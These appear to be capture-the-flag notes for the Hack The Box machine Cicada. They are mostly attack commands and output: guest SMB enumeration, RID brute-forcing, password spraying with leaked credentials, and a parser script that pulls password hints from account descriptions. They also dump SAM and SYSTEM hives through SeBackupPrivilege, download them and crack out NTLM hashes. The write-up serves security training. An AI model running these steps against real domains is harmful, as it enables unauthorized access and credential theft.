
Cicada

nmap the target to find the open ports

Enumerate users

crackmapexec smb cicada.htb -u 'guest' -p '' --shares

smbclient -N //$target/HR

nxc smb cicada.htb -u 'guest' -p '' --rid-brute

Cut the usernames out of the DOMAIN\user lines

cat file.txt | cut -d'\' -f2 | cut -d' ' -f1

crackmapexec smb 10.10.11.35 -u '' -p '' --users | awk -F'\\\\' '{split($2,a," "); print a[1]}'

Spray password

netexec smb cicada.htb -u userlist.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

Check whether there are any new users (the --users listing also prints each account's description):

netexec smb cicada.htb -u userlist.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

Running this shows the user descriptions; david.orelious's description reads "Just in case I forget my password is aRt$Lp#7t*VQ!3", which gives the credential david.orelious / aRt$Lp#7t*VQ!3.
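The two enumeration steps above (RID brute-force into a user list, then mining account descriptions for password hints) as a small parser, an added example that is not part of the original notes. The nxc lines inside it are constructed to resemble nxc/netexec output; the column layout varies between versions, so check the field positions against your own output before trusting them.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): parse nxc/crackmapexec output
# into a clean user list and pull password hints out of account descriptions.

# Constructed --rid-brute output. Note the group names containing spaces:
# the notes' "cut -d' ' -f1" would silently truncate those, so this parser
# keys on the "(SidTypeUser)" marker instead of on the first space.
RID_BRUTE_SAMPLE='SMB  10.10.11.35  445  CICADA-DC  498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  500: CICADA\Administrator (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  501: CICADA\Guest (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  512: CICADA\Domain Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1106: CICADA\michael.wrightson (SidTypeUser)'

# Constructed --users output: header row, then one row per account.
USERS_SAMPLE='SMB  10.10.11.35  445  CICADA-DC  -Username-      -Last PW Set-        -BadPW-  -Description-
SMB  10.10.11.35  445  CICADA-DC  Administrator   2024-08-26 20:08:03  0        Built-in account for administering the computer/domain
SMB  10.10.11.35  445  CICADA-DC  david.orelious  2024-03-14 12:17:29  0        Just in case I forget my password is aRt$Lp#7t*VQ!3'

# Keep only user principals (groups and aliases are useless for a spray),
# then strip the DOMAIN\ prefix and the trailing "(SidTypeUser)" marker.
rid_brute_to_userlist() {
  grep '(SidTypeUser)' | sed -E 's/.*\\(.*) \(SidTypeUser\).*/\1/'
}

# Print "user: description" for every account whose description mentions a
# password. Fields 1-4 are nxc's protocol/ip/port/host columns, 5 is the user,
# 6-7 the "last PW set" timestamp, 8 the bad-password count; the description
# is everything from field 9 on, so it is re-joined with single spaces.
description_hints() {
  awk '$5 != "-Username-" {
    desc = ""
    for (i = 9; i <= NF; i++) desc = desc (i > 9 ? " " : "") $i
    if (tolower(desc) ~ /pass|pwd|cred/) print $5 ": " desc
  }'
}

# Stand-alone run: user list to stdout, then any password hints.
printf '%s\n' "$RID_BRUTE_SAMPLE" | rid_brute_to_userlist
printf '%s\n' "$USERS_SAMPLE" | description_hints
```

In practice the first function's output is what goes into userlist.txt for the spray, and the second is run over the --users output of whichever account the spray validated.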

Two ways to escalate to admin; the SeBackupPrivilege route is the one shown below:

https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/blob/master/Notes/SeBackupPrivilege.md

*Evil-WinRM* PS C:\temp> reg save hklm\sam c:\temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\temp> dir


Directory: C:\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/29/2025 3:07 PM 49152 sam
-a---- 11/29/2025 2:56 PM 49152 sam.hive
-a---- 11/29/2025 2:56 PM 18518016 system.hive


*Evil-WinRM* PS C:\temp> reg save hklm\system c:\temp\system
The operation completed successfully.

download sam
download system
pypykatz registry --sam sam system

lika@learning:~/Downloads/cicada$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
lika@learning:~/Downloads/cicada$ pypykatz registry --sam sam system
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Spider the HR share as guest (--regex needs a pattern; '.' matches every file):

nxc smb $target -u 'guest' -p '' --shares --spider HR --regex .